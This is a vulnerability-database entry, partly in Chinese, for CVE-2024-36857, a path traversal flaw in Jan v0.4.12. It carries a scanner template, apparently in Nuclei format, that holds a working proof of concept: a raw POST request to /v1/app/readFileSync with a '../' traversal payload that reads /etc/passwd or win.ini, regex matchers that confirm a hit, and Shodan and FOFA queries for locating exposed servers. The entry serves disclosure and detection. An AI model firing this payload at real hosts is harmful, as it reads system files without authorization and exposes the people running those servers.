漏洞描述
Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.
CVE-2024-36857: Jan v0.4.12 'readFileSync' - Path Traversal
PoC代码[已公开]
id: CVE-2024-36857
info:
name: Jan v0.4.12 'readFileSync' - Path Traversal
author: Yusuf Amr
severity: high
description: |
Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.
reference:
- https://www.wiz.io/vulnerability-database/cve/cve-2024-36857
- https://github.com/HackAllSec/CVEs/tree/main/Jan%20AFR%20vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-36857
epss-score: 0.55135
epss-percentile: 0.97942
cpe: cpe:2.3:a:homebrew:jan:0.4.12:*:*:*:*:*:*:*
metadata:
verified: true
shodan-query: http.favicon.hash:"-165268926"
fofa-query: icon_hash="-165268926"
vendor: homebrew
product: jan
tags: cve,cve2024,jan,lfi,vkev,vuln
http:
- raw:
- |
POST /v1/app/readFileSync HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain;charset=UTF-8
["file:/../../../../../..{{path}}","utf-8"]
payloads:
path:
- '/etc/passwd'
- '/Windows/win.ini'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: word
part: content_type
words:
- "text/plain"
- type: status
status:
- 200
# digest: 490a0046304402201370d90afd7cb8f99d509d9b65bc50e159f9f3a34b23ba3037eeee03d40b1f70022044e9abbdcde5a3fb77ff75f8723a5f12db5b58c8b36468108445a2bc9e58a75b:922c64590222798bb761d5b6d8e72950